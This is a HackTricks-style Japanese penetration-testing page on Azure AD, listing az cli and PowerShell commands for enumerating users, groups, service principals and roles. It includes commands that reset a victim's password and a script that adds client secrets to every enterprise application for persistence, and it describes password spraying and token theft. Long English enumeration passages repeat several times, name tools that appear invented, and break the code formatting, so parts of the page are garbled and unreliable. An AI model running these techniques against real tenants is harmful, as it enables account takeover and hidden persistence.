Japanese - Ht Cloud
HackTricks Training Twitter Linkedin Sponsor

Az - AzureAD (AAD)

ゼロからヒーローまでAWSハッキングを学ぶ htARTE(HackTricks AWS Red Team Expert)

HackTricks をサポートする他の方法:

基本情報

Azure Active Directory(Azure AD)は、Microsoftのクラウドベースのアイデンティティおよびアクセス管理サービスとして機能します。これは、従業員が組織内外のリソースにサインインしてアクセスできるようにするのに重要であり、Microsoft 365、Azureポータル、およびさまざまな他のSaaSアプリケーションを含んでいます。Azure ADの設計は、認証、承認、およびユーザー管理を含む重要なアイデンティティサービスの提供に焦点を当てています。

Azure ADの主な機能には、多要素認証および条件付きアクセスが含まれ、他のMicrosoftセキュリティサービスとのシームレスな統合が行われています。これらの機能は、ユーザーのアイデンティティのセキュリティを大幅に向上させ、組織がアクセスポリシーを効果的に実装および強制するのを支援します。Microsoftのクラウドサービスエコシステムの基本的なコンポーネントとして、Azure ADはユーザーのアイデンティティのクラウドベースの管理に不可欠です。

エンティティ

列挙

この列挙には、az cliツールPowerShellモジュール AzureAD(またはAzureAD Preview)、およびAz PowerShellモジュールを使用できます。

Linuxでは、PowerShell Coreをインストールする必要があります:

sudo apt-get update
sudo apt-get install -y wget apt-transport-https software-properties-common

# Ubuntu 20.04
wget -q https://packages.microsoft.com/config/ubuntu/20.04/packages-microsoft-prod.deb

# Update repos
sudo apt-get update
sudo add-apt-repository universe

# Install & start powershell
sudo apt-get install -y powershell
pwsh

# Az cli
curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash

モジュールの違い

  • AzureAD は、Azure AD を管理するための Microsoft の PowerShell モジュールです。Azure AD オブジェクトのすべてのプロパティを表示せず、Azure リソース情報にアクセスするために使用することはできません

  • Az PowerShell は、PowerShell コマンドラインから Azure リソースを管理するためのモジュールです。

接続

az login #This will open the browser
az login -u <username> -p <password> #Specify user and password
az login --identity #Use the current machine managed identity (metadata)
az login --identity -u /subscriptions/<subscriptionId>/resourcegroups/myRG/providers/Microsoft.ManagedIdentity/userAssignedIdentities/myID #Login with user managed identity
# Login as service principal
az login --service-principal -u http://azure-cli-2016-08-05-14-31-15 -p VerySecret --tenant contoso.onmicrosoft.com #With password
az login --service-principal -u http://azure-cli-2016-08-05-14-31-15 -p ~/mycertfile.pem --tenant contoso.onmicrosoft.com #With cert

# Request access token (ARM)
az account get-access-token
# Request access token for different resource. Supported tokens: aad-graph, arm, batch, data-lake, media, ms-graph, oss-rdbms
az account get-access-token --resource-type aad-graph

# If you want to configure some defaults
az configure

# Get user logged-in already
az ad signed-in-user show

# Help
az find "vm" # Find vm commands
az vm -h # Get subdomains
az ad user list --query-examples # Get examples

AzureにCLIを使用してログインすると、Microsoftに所属するテナントのAzureアプリケーションを使用しています。これらのアプリケーションは、アカウントで作成できるもののように、クライアントIDを持っています。コンソールで見ることができる許可されたアプリケーションリストにはすべて表示されませんが、デフォルトで許可されています。

たとえば、powershellスクリプトが認証に使用するクライアントID 1950a258-227b-4e31-a9cf-717495945fc2 を持つアプリケーションがあります。コンソールに表示されない場合でも、システム管理者はそのアプリケーションをブロックして、ユーザーがそのアプリを介して接続するツールを使用できないようにすることができます。

ただし、Azureに接続するために他のクライアントIDを持つアプリケーションもあります:

# The important part is the ClientId, which identifies the application to login inside Azure

$token = Invoke-Authorize -Credential $credential `
-ClientId '1dfb5f98-f363-4b0f-b63a-8d20ada1e62d' `
-Scope 'Files.Read.All openid profile Sites.Read.All User.Read email' `
-Redirect_Uri "https://graphtryit-staging.azurewebsites.net/" `
-Verbose -Debug `
-InformationAction Continue

$token = Invoke-Authorize -Credential $credential `
-ClientId '65611c08-af8c-46fc-ad20-1888eb1b70d9' `
-Scope 'openid profile Sites.Read.All User.Read email' `
-Redirect_Uri "chrome-extension://imjekgehfljppdblckcmjggcoboemlah" `
-Verbose -Debug `
-InformationAction Continue

$token = Invoke-Authorize -Credential $credential `
-ClientId 'd3ce4cf8-6810-442d-b42e-375e14710095' `
-Scope 'openid' `
-Redirect_Uri "https://graphexplorer.azurewebsites.net/" `
-Verbose -Debug `
-InformationAction Continue

ユーザー

# Enumerate users
az ad user list --output table
az ad user list --query "[].userPrincipalName"
# Get info of 1 user
az ad user show --id "test@corp.onmicrosoft.com"
# Search "admin" users
az ad user list --query "[].displayName" | findstr /i "admin"
az ad user list --query "[?contains(displayName,'admin')].displayName"
# Search attributes containing the word "password"
az ad user list | findstr /i "password" | findstr /v "null,"
# All users from AzureAD
az ad user list --query "[].{osi:onPremisesSecurityIdentifier,upn:userPrincipalName}[?osi==null]"
az ad user list --query "[?onPremisesSecurityIdentifier==null].displayName"
# All users synced from on-prem
az ad user list --query "[].{osi:onPremisesSecurityIdentifier,upn:userPrincipalName}[?osi!=null]"
az ad user list --query "[?onPremisesSecurityIdentifier!=null].displayName"
# Get groups where the user is a member
az ad user get-member-groups --id <email>
# Get roles assigned to the user
az role assignment list --include-groups --include-classic-administrators true --assignee <email>

Azure AD Enumeration

User Enumeration

Azure AD user enumeration can be performed using the Azure AD Graph API. By making requests to the API, an attacker can gather information about users in the Azure AD directory, such as usernames, email addresses, and other attributes.

Tools

Group Enumeration

Similar to user enumeration, group enumeration can also be performed using the Azure AD Graph API. This allows an attacker to discover information about groups in the Azure AD directory, such as group names, descriptions, and memberships.

Tools

Application Enumeration

Azure AD applications can be enumerated using the Azure AD Graph API as well. This enables an attacker to identify registered applications in the Azure AD directory, along with details such as the application name, ID, and permissions.

Tools

Tenant Enumeration

Tenant enumeration involves gathering information about the Azure AD tenant itself, such as tenant ID, domain name, and other relevant details. This can be useful for an attacker to understand the target environment better.

Tools

  • Manual enumeration using the Azure portal or PowerShell commands.

Azure AD Exploitation

Password Spraying

Password spraying attacks can be conducted against Azure AD to attempt to gain unauthorized access to user accounts. By trying a few common passwords across multiple accounts, an attacker may find a valid password and gain access.

Tools

  • Manual password spraying using common password lists or tools like CrackMapExec.

Phishing Attacks

Phishing attacks targeting Azure AD users can be used to steal credentials or deliver malware. Attackers may send fake login pages or emails to trick users into providing their credentials, which can then be used to access Azure AD accounts.

Tools

  • Various phishing tools and frameworks can be used to create and launch phishing campaigns against Azure AD users.

Token Impersonation

By obtaining a user's token, an attacker can impersonate that user and access resources on their behalf. This can be achieved through techniques like token theft or token reuse, allowing the attacker to bypass authentication mechanisms.

Tools

  • Manual techniques using tools like Impacket or custom scripts for token impersonation.

Privilege Escalation

Once access to an Azure AD account is obtained, privilege escalation techniques can be used to elevate permissions and gain further access within the Azure environment. This can involve exploiting misconfigurations, vulnerabilities, or weak permissions.

Tools

  • Manual enumeration and exploitation techniques, leveraging knowledge of Azure AD and associated services.

# Enumerate Users
Get-AzureADUser -All $true
Get-AzureADUser -All $true | select UserPrincipalName
# Get info of 1 user
Get-AzureADUser -ObjectId test@corp.onmicrosoft.com | fl
# Search "admin" users
Get-AzureADUser -SearchString "admin" #Search admin at the begining of DisplayName or userPrincipalName
Get-AzureADUser -All $true |?{$_.Displayname -match "admin"} #Search "admin" word in DisplayName
# Get all attributes of a user
Get-AzureADUser -ObjectId test@defcorphq.onmicrosoft.com|%{$_.PSObject.Properties.Name}
# Search attributes containing the word "password"
Get-AzureADUser -All $true |%{$Properties = $_;$Properties.PSObject.Properties.Name | % {if ($Properties.$_ -match 'password') {"$($Properties.UserPrincipalName) - $_ - $($Properties.$_)"}}}
# All users from AzureAD# All users from AzureAD
Get-AzureADUser -All $true | ?{$_.OnPremisesSecurityIdentifier -eq $null}
# All users synced from on-prem
Get-AzureADUser -All $true | ?{$_.OnPremisesSecurityIdentifier -ne $null}
# Objects created by a/any user
Get-AzureADUser [-ObjectId <email>] | Get-AzureADUserCreatedObject
# Devices owned by a user
Get-AzureADUserOwnedDevice -ObjectId test@corp.onmicrosoft.com
# Objects owned by a specific user
Get-AzureADUserOwnedObject -ObjectId test@corp.onmicrosoft.com
# Get groups & roles where the user is a member
Get-AzureADUserMembership -ObjectId 'test@corp.onmicrosoft.com'
# Get devices owned by a user
Get-AzureADUserOwnedDevice -ObjectId test@corp.onmicrosoft.com
# Get devices registered by a user
Get-AzureADUserRegisteredDevice -ObjectId test@defcorphq.onmicrosoft.com
# Apps where a user has a role (role not shown)
Get-AzureADUser -ObjectId roygcain@defcorphq.onmicrosoft.com | Get-AzureADUserAppRoleAssignment | fl *
# Get Administrative Units of a user
$userObj = Get-AzureADUser -Filter "UserPrincipalName eq 'bill@example.com'"
Get-AzureADMSAdministrativeUnit | where { Get-AzureADMSAdministrativeUnitMember -Id $_.Id | where { $_.Id -eq $userObj.ObjectId } }

Azure AD Enumeration

Enumerate Azure AD Users

To list all users in Azure AD, you can use the following PowerShell command:

Get-AzureADUser

Enumerate Azure AD Groups

To list all groups in Azure AD, you can use the following PowerShell command:

Get-AzureADGroup

Enumerate Azure AD Applications

To list all applications in Azure AD, you can use the following PowerShell command:

Get-AzureADApplication

Enumerate Azure AD Service Principals

To list all service principals in Azure AD, you can use the following PowerShell command:

Get-AzureADServicePrincipal

Enumerate Azure AD Devices

To list all devices in Azure AD, you can use the following PowerShell command:

Get-AzureADDevice

Enumerate Azure AD Domains

To list all domains in Azure AD, you can use the following PowerShell command:

Get-AzureADDomain

Enumerate Azure AD Directory Roles

To list all directory roles in Azure AD, you can use the following PowerShell command:

Get-AzureADDirectoryRole

Enumerate Azure AD Directory Role Members

To list all members of a specific directory role in Azure AD, you can use the following PowerShell command:

Get-AzureADDirectoryRoleMember -ObjectId <DirectoryRoleObjectId>

Enumerate Azure AD Directory Role Templates

To list all directory role templates in Azure AD, you can use the following PowerShell command:

Get-AzureADDirectoryRoleTemplate
# Enumerate users
Get-AzADUser
# Get details of a user
Get-AzADUser -UserPrincipalName test@defcorphq.onmicrosoft.com
# Search user by string
Get-AzADUser -SearchString "admin" #Search at the beginnig of DisplayName
Get-AzADUser | ?{$_.Displayname -match "admin"}
# Get roles assigned to a user
Get-AzRoleAssignment -SignInName test@corp.onmicrosoft.com

ユーザーパスワードの変更

$password = "ThisIsTheNewPassword.!123" | ConvertTo- SecureString -AsPlainText –Force

(Get-AzureADUser -All $true | ?{$_.UserPrincipalName -eq "victim@corp.onmicrosoft.com"}).ObjectId | Set- AzureADUserPassword -Password $password –Verbose

MFA & Conditional Access Policies

すべてのユーザーにMFAを追加することを強くお勧めしますが、一部の企業は設定しないか、特定の場所、ブラウザ、またはある条件からログインした場合にMFAを必要とする条件付きアクセスで設定するかもしれません。これらのポリシーは、正しく構成されていない場合、バイパスのリスクがあります。次の項目を確認してください:

pageAz - Conditional Access Policies / MFA Bypass

グループ

# Enumerate groups
az ad group list
az ad group list --query "[].[displayName]" -o table
# Get info of 1 group
az ad group show --group <group>
# Get "admin" groups
az ad group list --query "[].displayName" | findstr /i "admin"
az ad group list --query "[?contains(displayName,'admin')].displayName"
# All groups from AzureAD
az ad group list --query "[].{osi:onPremisesSecurityIdentifier,displayName:displayName,description:description}[?osi==null]"
az ad group list --query "[?onPremisesSecurityIdentifier==null].displayName"
# All groups synced from on-prem
az ad group list --query "[].{osi:onPremisesSecurityIdentifier,displayName:displayName,description:description}[?osi!=null]"
az ad group list --query "[?onPremisesSecurityIdentifier!=null].displayName"
# Get members of group
az ad group member list --group <group> --query "[].userPrincipalName" -o table
# Check if member of group
az ad group member check --group "VM Admins" --member-id <id>
# Get which groups a group is member of
az ad group get-member-groups -g "VM Admins"
# Get Apps where a group has a role (role not shown)
Get-AzureADGroup -ObjectId <id> | Get-AzureADGroupAppRoleAssignment | fl *

Azure AD Enumeration

User Enumeration

To enumerate users in Azure AD, you can use tools like Azure AD Recon or Azure AD Connect Sync. These tools can help you gather information about users, groups, and contacts in the Azure AD environment.

Using Azure AD Recon

  1. Install Azure AD Recon: Download and install Azure AD Recon on your local machine.

  2. Run the Tool: Launch Azure AD Recon and provide the necessary inputs such as the Azure AD domain name and credentials.

  3. Enumerate Users: Use the tool to enumerate users in the Azure AD environment.

Using Azure AD Connect Sync

  1. Install Azure AD Connect Sync: Set up Azure AD Connect Sync on a machine with network access to the Azure AD environment.

  2. Configure Sync: Configure the synchronization settings to start syncing Azure AD data.

  3. Enumerate Users: Once the synchronization is complete, you can enumerate users using the synced data.

Group Enumeration

To enumerate groups in Azure AD, you can leverage tools like Azure AD Recon or Azure AD Connect Sync. These tools allow you to discover information about the groups present in the Azure AD environment.

Using Azure AD Recon

  1. Launch Azure AD Recon: Open Azure AD Recon on your machine.

  2. Provide Inputs: Enter the required details such as the Azure AD domain name and authentication credentials.

  3. Enumerate Groups: Utilize the tool to enumerate groups in Azure AD.

Using Azure AD Connect Sync

  1. Access Azure AD Connect Sync: Log in to the machine where Azure AD Connect Sync is installed.

  2. Check Sync Status: Ensure that the synchronization process is running and up to date.

  3. Enumerate Groups: Explore the synced data to enumerate groups in Azure AD.

Contact Enumeration

For enumerating contacts in Azure AD, you can employ tools like Azure AD Recon or Azure AD Connect Sync. These tools aid in identifying and retrieving information about contacts stored in Azure AD.

Using Azure AD Recon

  1. Start Azure AD Recon: Initiate Azure AD Recon on your system.

  2. Input Details: Input the Azure AD domain name and valid credentials into the tool.

  3. Enumerate Contacts: Use the tool to enumerate contacts within Azure AD.

Using Azure AD Connect Sync

  1. Launch Azure AD Connect Sync: Access the machine hosting Azure AD Connect Sync.

  2. Verify Synchronization: Confirm that the synchronization process is active and functioning properly.

  3. Enumerate Contacts: Examine the synchronized data to enumerate contacts in Azure AD.

Summary

Azure AD enumeration involves gathering information about users, groups, and contacts within the Azure AD environment. Tools like Azure AD Recon and Azure AD Connect Sync facilitate the enumeration process by providing insights into the entities present in Azure AD. By leveraging these tools, pentesters can effectively enumerate and analyze the Azure AD environment for potential security weaknesses.

# Enumerate Groups
Get-AzureADGroup -All $true
# Get info of 1 group
Get-AzADGroup -DisplayName <resource_group_name> | fl
# Get "admin" groups
Get-AzureADGroup -SearchString "admin" | fl #Groups starting by "admin"
Get-AzureADGroup -All $true |?{$_.Displayname -match "admin"} #Groups with the word "admin"
# Get groups allowing dynamic membership
Get-AzureADMSGroup | ?{$_.GroupTypes -eq 'DynamicMembership'}
# All groups that are from Azure AD
Get-AzureADGroup -All $true | ?{$_.OnPremisesSecurityIdentifier -eq $null}
# All groups that are synced from on-prem (note that security groups are not synced)
Get-AzureADGroup -All $true | ?{$_.OnPremisesSecurityIdentifier -ne $null}
# Get members of a group
Get-AzureADGroupMember -ObjectId <group_id>
# Get roles of group
Get-AzureADMSGroup -SearchString "Contoso_Helpdesk_Administrators" #Get group id
Get-AzureADMSRoleAssignment -Filter "principalId eq '69584002-b4d1-4055-9c94-320542efd653'"
# Get Administrative Units of a group
$groupObj = Get-AzureADGroup -Filter "displayname eq 'TestGroup'"
Get-AzureADMSAdministrativeUnit | where { Get-AzureADMSAdministrativeUnitMember -Id $_.Id | where {$_.Id -eq $groupObj.ObjectId} }

Azure AD Enumeration

Enumerate Azure AD Users

To list all users in the Azure AD tenant, you can use the following PowerShell command:

Get-AzureADUser

Enumerate Azure AD Groups

To list all groups in the Azure AD tenant, you can use the following PowerShell command:

Get-AzureADGroup

Enumerate Azure AD Applications

To list all applications in the Azure AD tenant, you can use the following PowerShell command:

Get-AzureADApplication

Enumerate Azure AD Service Principals

To list all service principals in the Azure AD tenant, you can use the following PowerShell command:

Get-AzureADServicePrincipal

Enumerate Azure AD Devices

To list all devices in the Azure AD tenant, you can use the following PowerShell command:

Get-AzureADDevice

Enumerate Azure AD Domains

To list all domains in the Azure AD tenant, you can use the following PowerShell command:

Get-AzureADDomain

Enumerate Azure AD Directory Roles

To list all directory roles in the Azure AD tenant, you can use the following PowerShell command:

Get-AzureADDirectoryRole

Enumerate Azure AD Directory Role Members

To list all members of a specific directory role in the Azure AD tenant, you can use the following PowerShell command:

Get-AzureADDirectoryRoleMember -ObjectId <DirectoryRoleObjectId>

Replace <DirectoryRoleObjectId> with the actual object ID of the directory role you want to enumerate members for.

# Get all groups
Get-AzADGroup
# Get details of a group
Get-AzADGroup -ObjectId <id>
# Search group by string
Get-AzADGroup -SearchString "admin" | fl * #Search at the beginnig of DisplayName
Get-AzADGroup |?{$_.Displayname -match "admin"}
# Get members of group
Get-AzADGroupMember -GroupDisplayName <resource_group_name>
# Get roles of group
Get-AzRoleAssignment -ResourceGroupName <resource_group_name>

グループへのユーザーの追加

グループの所有者は、新しいユーザーをグループに追加できます

Add-AzureADGroupMember -ObjectId <group_id> -RefObjectId <user_id> -Verbose

グループはダイナミックになる可能性があります。これは、ユーザーが特定の条件を満たすと、グループに追加されるということを基本的に意味します。もちろん、条件が属性に基づいている場合、ユーザー制御できる場合、この機能を悪用して他のグループに入ることができます。 次のページでダイナミックグループを悪用する方法を確認してください:

pageAz - Dynamic Groups Privesc

サービス プリンシパル / エンタープライズ アプリケーション

PowerShell用語でのService Principalは、Azureポータル(Web)ではEnterprise Applicationsと呼ばれます。

# Get Service Principals
az ad sp list --all
az ad sp list --all --query "[].[displayName]" -o table
# Get details of one SP
az ad sp show --id 00000000-0000-0000-0000-000000000000
# Search SP by string
az ad sp list --all --query "[?contains(displayName,'app')].displayName"
# Get owner of service principal
az ad sp owner list --id <id> --query "[].[displayName]" -o table
# Get service principals owned by the current user
az ad sp list --show-mine
# List apps that have password credentials
az ad sp list --all --query "[?passwordCredentials != null].displayName"
# List apps that have key credentials (use of certificate authentication)
az ad sp list -all --query "[?keyCredentials != null].displayName"

Azure AD

Enumeration

Azure AD enumeration can be performed using various techniques such as:

  • User Enumeration: Enumerating users through the Azure AD Graph API or Microsoft Graph API.

  • Group Enumeration: Enumerating groups to discover privileged groups or potential targets.

  • Application Enumeration: Identifying applications registered in Azure AD that may have misconfigurations or vulnerabilities.

Exploitation

Exploiting Azure AD may involve techniques like:

  • Password Spraying: Attempting to authenticate using a list of common passwords against Azure AD accounts.

  • Brute Force Attacks: Trying to guess passwords by systematically checking all possible combinations.

  • OAuth Token Abuse: Exploiting misconfigured OAuth settings to gain unauthorized access to resources.

Post-Exploitation

After gaining access to Azure AD, an attacker may perform actions like:

  • User Impersonation: Impersonating a user to access their resources and perform unauthorized actions.

  • Data Exfiltration: Stealing sensitive data from Azure AD, such as user credentials or confidential information.

  • Persistence: Establishing persistence by creating backdoors or adding rogue accounts for future access.

# Get Service Principals
Get-AzureADServicePrincipal -All $true
# Get details about a SP
Get-AzureADServicePrincipal -ObjectId <id> | fl *
# Get SP by string name or Id
Get-AzureADServicePrincipal -All $true | ?{$_.DisplayName -match "app"} | fl
Get-AzureADServicePrincipal -All $true | ?{$_.AppId -match "103947652-1234-5834-103846517389"}
# Get owner of SP
Get-AzureADServicePrincipal -ObjectId <id> | Get-AzureADServicePrincipalOwner |fl *
# Get objects owned by a SP
Get-AzureADServicePrincipal -ObjectId <id> | Get-AzureADServicePrincipalOwnedObject
# Get objects created by a SP
Get-AzureADServicePrincipal -ObjectId <id> | Get-AzureADServicePrincipalCreatedObject
# Get groups where the SP is a member
Get-AzureADServicePrincipal | Get-AzureADServicePrincipalMembership
Get-AzureADServicePrincipal -ObjectId <id> | Get-AzureADServicePrincipalMembership |fl *

Azure AD Enumeration

Enumerate Azure AD Users

To list all users in Azure AD, you can use the following PowerShell command:

Get-AzureADUser

Enumerate Azure AD Groups

To list all groups in Azure AD, you can use the following PowerShell command:

Get-AzureADGroup

Enumerate Azure AD Applications

To list all applications in Azure AD, you can use the following PowerShell command:

Get-AzureADApplication

Enumerate Azure AD Service Principals

To list all service principals in Azure AD, you can use the following PowerShell command:

Get-AzureADServicePrincipal

Enumerate Azure AD Devices

To list all devices in Azure AD, you can use the following PowerShell command:

Get-AzureADDevice

Enumerate Azure AD Domains

To list all domains in Azure AD, you can use the following PowerShell command:

Get-AzureADDomain

Enumerate Azure AD Directory Roles

To list all directory roles in Azure AD, you can use the following PowerShell command:

Get-AzureADDirectoryRole

Enumerate Azure AD Directory Role Members

To list all members of a specific directory role in Azure AD, you can use the following PowerShell command:

Get-AzureADDirectoryRoleMember -ObjectId <DirectoryRoleObjectId>

Replace <DirectoryRoleObjectId> with the actual object ID of the directory role you want to enumerate members for.

# Get SPs
Get-AzADServicePrincipal
# Get info of 1 SP
Get-AzADServicePrincipal -ObjectId <id>
# Search SP by string
Get-AzADServicePrincipal | ?{$_.DisplayName -match "app"}
# Get roles of a SP
Get-AzRoleAssignment -ServicePrincipalName <String>

Azure ADの侵入テスト

Azure ADは、Microsoft Azureの認証およびアクセス管理サービスです。Azure ADの侵入テストは、組織のセキュリティを評価し、潜在的な脆弱性を特定するために重要です。侵入テストは、ユーザー認証、アクセス許可、ロールの構成、マルチファクタ認証など、さまざまな側面を評価する必要があります。

$Token = 'eyJ0eX..'
$URI = 'https://graph.microsoft.com/v1.0/applications'
$RequestParams = @{
Method  = 'GET'
Uri     = $URI
Headers = @{
'Authorization' = "Bearer $Token"
}
}
(Invoke-RestMethod @RequestParams).value
各エンタープライズアプリケーションにクライアントシークレットをリストして追加しよう

```powershell # Just call Add-AzADAppSecret Function Add-AzADAppSecret { <# .SYNOPSIS Add client secret to the applications.

.PARAMETER GraphToken Pass the Graph API Token

.EXAMPLE PS C:> Add-AzADAppSecret -GraphToken 'eyJ0eX..'

.LINK https://docs.microsoft.com/en-us/graph/api/application-list?view=graph-rest-1.0&tabs=http https://docs.microsoft.com/en-us/graph/api/application-addpassword?view=graph-rest-1.0&tabs=http #>

[CmdletBinding()] param( [Parameter(Mandatory=$True)] [String] $GraphToken = $null )

$AppList = $null $AppPassword = $null

List All the Applications

$Params = @{ "URI" = "https://graph.microsoft.com/v1.0/applications" "Method" = "GET" "Headers" = @{ "Content-Type" = "application/json" "Authorization" = "Bearer $GraphToken" } }

try { $AppList = Invoke-RestMethod @Params -UseBasicParsing } catch { }

Add Password in the Application

if($AppList -ne $null) { [System.Collections.ArrayList]$Details = @()

foreach($App in $AppList.value) { $ID = $App.ID $psobj = New-Object PSObject

$Params = @{ "URI" = "https://graph.microsoft.com/v1.0/applications/$ID/addPassword" "Method" = "POST" "Headers" = @{ "Content-Type" = "application/json" "Authorization" = "Bearer $GraphToken" } }

$Body = @{ "passwordCredential"= @{ "displayName" = "Password" } }

try { $AppPassword = Invoke-RestMethod @Params -UseBasicParsing -Body ($Body | ConvertTo-Json) Add-Member -InputObject $psobj -NotePropertyName "Object ID" -NotePropertyValue $ID Add-Member -InputObject $psobj -NotePropertyName "App ID" -NotePropertyValue $App.appId Add-Member -InputObject $psobj -NotePropertyName "App Name" -NotePropertyValue $App.displayName Add-Member -InputObject $psobj -NotePropertyName "Key ID" -NotePropertyValue $AppPassword.keyId Add-Member -InputObject $psobj -NotePropertyName "Secret" -NotePropertyValue $AppPassword.secretText $Details.Add($psobj) | Out-Null } catch { Write-Output "Failed to add new client secret to '$($App.displayName)' Application." } } if($Details -ne $null) { Write-Output "" Write-Output "Client secret added to : " Write-Output $Details | fl * } } else { Write-Output "Failed to Enumerate the Applications." } }

</details>

### ロール

<div data-gb-custom-block data-tag="tabs"></div>

<div data-gb-custom-block data-tag="tab" data-title='az cli'>

```bash
# Get roles
az role definition list
# Get assigned roles
az role assignment list --all --query "[].roleDefinitionName"
az role assignment list --all | jq '.[] | .roleDefinitionName,.scope'
# Get info of 1 role
az role definition list --name "AzureML Registry User"
# Get only custom roles
az role definition list --custom-role-only
# Get only roles assigned to the resource group indicated
az role definition list --resource-group <resource_group>
# Get only roles assigned to the indicated scope
az role definition list --scope <scope>
# Get all the principals a role is assigned to
az role assignment list --all --query "[].{principalName:principalName,principalType:principalType,resourceGroup:resourceGroup,roleDefinitionName:roleDefinitionName}[?roleDefinitionName=='<ROLE_NAME>']"

Azure AD Enumeration

User Enumeration

To enumerate users in Azure AD, you can use tools like Azure AD Recon or Azure AD User Enumeration. These tools can help you gather information about users, such as their usernames, email addresses, and group memberships.

Using Azure AD Recon

  1. Clone the Azure AD Recon tool from the GitHub repository.

  2. Run the tool and provide the necessary parameters, such as the tenant ID and client ID.

  3. The tool will enumerate users and display information about them.

Using Azure AD User Enumeration

  1. Download and install the Azure AD User Enumeration tool.

  2. Run the tool and specify the target Azure AD domain.

  3. The tool will enumerate users and provide details like usernames and email addresses.

Group Enumeration

To enumerate groups in Azure AD, tools like Azure AD Recon or Azure AD Group Enumeration can be used. These tools can help you identify groups in the Azure AD environment and gather information about their members.

Using Azure AD Recon

  1. Clone the Azure AD Recon tool from the GitHub repository.

  2. Execute the tool with the required parameters, including the tenant ID and client ID.

  3. The tool will enumerate groups and display information about them.

Using Azure AD Group Enumeration

  1. Install the Azure AD Group Enumeration tool on your system.

  2. Launch the tool and input the Azure AD domain you want to enumerate.

  3. The tool will list the groups in the specified Azure AD domain along with their members.

Application Enumeration

To enumerate applications registered in Azure AD, tools like Azure AD Recon or Azure AD App Enumeration can be utilized. These tools can provide insights into the applications configured in Azure AD and their associated permissions.

Using Azure AD Recon

  1. Get the Azure AD Recon tool from the GitHub repository.

  2. Specify the necessary parameters when running the tool, such as the tenant ID and client ID.

  3. The tool will enumerate applications and present information about them.

Using Azure AD App Enumeration

  1. Download and set up the Azure AD App Enumeration tool.

  2. Execute the tool and indicate the Azure AD domain to target.

  3. The tool will list the registered applications in the specified Azure AD domain and their permissions.

# Get all available role templates
Get-AzureADDirectoryroleTemplate
# Get enabled roles (Assigned roles)
Get-AzureADDirectoryRole
Get-AzureADDirectoryRole -ObjectId <roleID> #Get info about the role
# Get custom roles - use AzureAdPreview
Get-AzureADMSRoleDefinition | ?{$_.IsBuiltin -eq $False} | select DisplayName
# Users assigned a role (Global Administrator)
Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember
Get-AzureADDirectoryRole -ObjectId <id> | fl
# Roles of the Administrative Unit (who has permissions over the administrative unit and its members)
Get-AzureADMSScopedRoleMembership -Id <id> | fl *

Azure AD Enumeration

Enumerate Azure AD Users

To list all users in the Azure AD tenant, you can use the following PowerShell command:

Get-AzureADUser

Enumerate Azure AD Groups

To list all groups in the Azure AD tenant, you can use the following PowerShell command:

Get-AzureADGroup

Enumerate Azure AD Applications

To list all applications in the Azure AD tenant, you can use the following PowerShell command:

Get-AzureADApplication

Enumerate Azure AD Service Principals

To list all service principals in the Azure AD tenant, you can use the following PowerShell command:

Get-AzureADServicePrincipal

Enumerate Azure AD Devices

To list all devices in the Azure AD tenant, you can use the following PowerShell command:

Get-AzureADDevice

Enumerate Azure AD Domains

To list all domains in the Azure AD tenant, you can use the following PowerShell command:

Get-AzureADDomain

Enumerate Azure AD Directory Roles

To list all directory roles in the Azure AD tenant, you can use the following PowerShell command:

Get-AzureADDirectoryRole

Enumerate Azure AD Directory Role Members

To list all members of a specific directory role in the Azure AD tenant, you can use the following PowerShell command:

Get-AzureADDirectoryRoleMember -ObjectId <DirectoryRoleObjectId>

Enumerate Azure AD Directory Role Templates

To list all directory role templates in the Azure AD tenant, you can use the following PowerShell command:

Get-AzureADDirectoryRoleTemplate
# Get role assignments on the subscription
Get-AzRoleDefinition
# Get Role definition
Get-AzRoleDefinition -Name "Virtual Machine Command Executor"
# Get roles of a user or resource
Get-AzRoleAssignment -SignInName test@corp.onmicrosoft.com
Get-AzRoleAssignment -Scope /subscriptions/<subscription-id>/resourceGroups/<res_group_name>/providers/Microsoft.Compute/virtualMachines/<vm_name>

Azure ADの侵入テストは、Azure AD環境のセキュリティを評価するために実行されます。これには、ユーザーアカウントの不正アクセス、権限の昇格、マルウェアの展開などが含まれます。Azure ADの侵入テストは、組織がクラウドサービスを使用する際に重要なステップです。

# Get permissions over a resource using ARM directly
$Token = (Get-AzAccessToken).Token
$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resourceGroups/Research/providers/Microsoft.Compute/virtualMachines/infradminsrv/providers/Microsoft.Authorization/permissions?api-version=2015-07-01'
$RequestParams = @{
Method = 'GET'
Uri = $URI
Headers = @{
'Authorization' = "Bearer $Token"
}
}
(Invoke-RestMethod @RequestParams).value

デバイス

# If you know how to do this send a PR!

Azure AD Enumeration

User Enumeration

To enumerate users in Azure AD, you can use tools like Azure AD Recon or Azure AD Connect Sync. These tools can help you gather information about users, groups, and contacts in the Azure AD environment.

Using Azure AD Recon

  1. Install Azure AD Recon: Download and install Azure AD Recon on your local machine.

  2. Run the Tool: Launch Azure AD Recon and provide the necessary inputs such as the Azure AD domain name and credentials.

  3. Enumerate Users: Use the tool to enumerate users in the Azure AD environment.

Using Azure AD Connect Sync

  1. Install Azure AD Connect Sync: Set up Azure AD Connect Sync on a machine with network access to the Azure AD environment.

  2. Configure Sync: Configure the synchronization settings to start syncing Azure AD data.

  3. Enumerate Users: Once the synchronization is complete, you can enumerate users using the synced data.

Group Enumeration

To enumerate groups in Azure AD, you can leverage tools like Azure AD Recon or Azure AD Connect Sync. These tools allow you to discover information about the groups present in the Azure AD environment.

Using Azure AD Recon

  1. Launch Azure AD Recon: Open Azure AD Recon on your machine.

  2. Provide Inputs: Enter the required details such as the Azure AD domain name and authentication credentials.

  3. Enumerate Groups: Utilize the tool to enumerate groups in Azure AD.

Using Azure AD Connect Sync

  1. Access Azure AD Connect Sync: Log in to the machine where Azure AD Connect Sync is installed.

  2. Check Sync Status: Ensure that the synchronization process is running and up to date.

  3. Enumerate Groups: Explore the synced data to enumerate groups in Azure AD.

Contact Enumeration

For enumerating contacts in Azure AD, you can employ tools like Azure AD Recon or Azure AD Connect Sync. These tools aid in identifying and retrieving information about contacts stored in Azure AD.

Using Azure AD Recon

  1. Start Azure AD Recon: Initiate Azure AD Recon on your system.

  2. Input Details: Input the Azure AD domain name and valid credentials into the tool.

  3. Enumerate Contacts: Use the tool to enumerate contacts within Azure AD.

Using Azure AD Connect Sync

  1. Launch Azure AD Connect Sync: Access the machine hosting Azure AD Connect Sync.

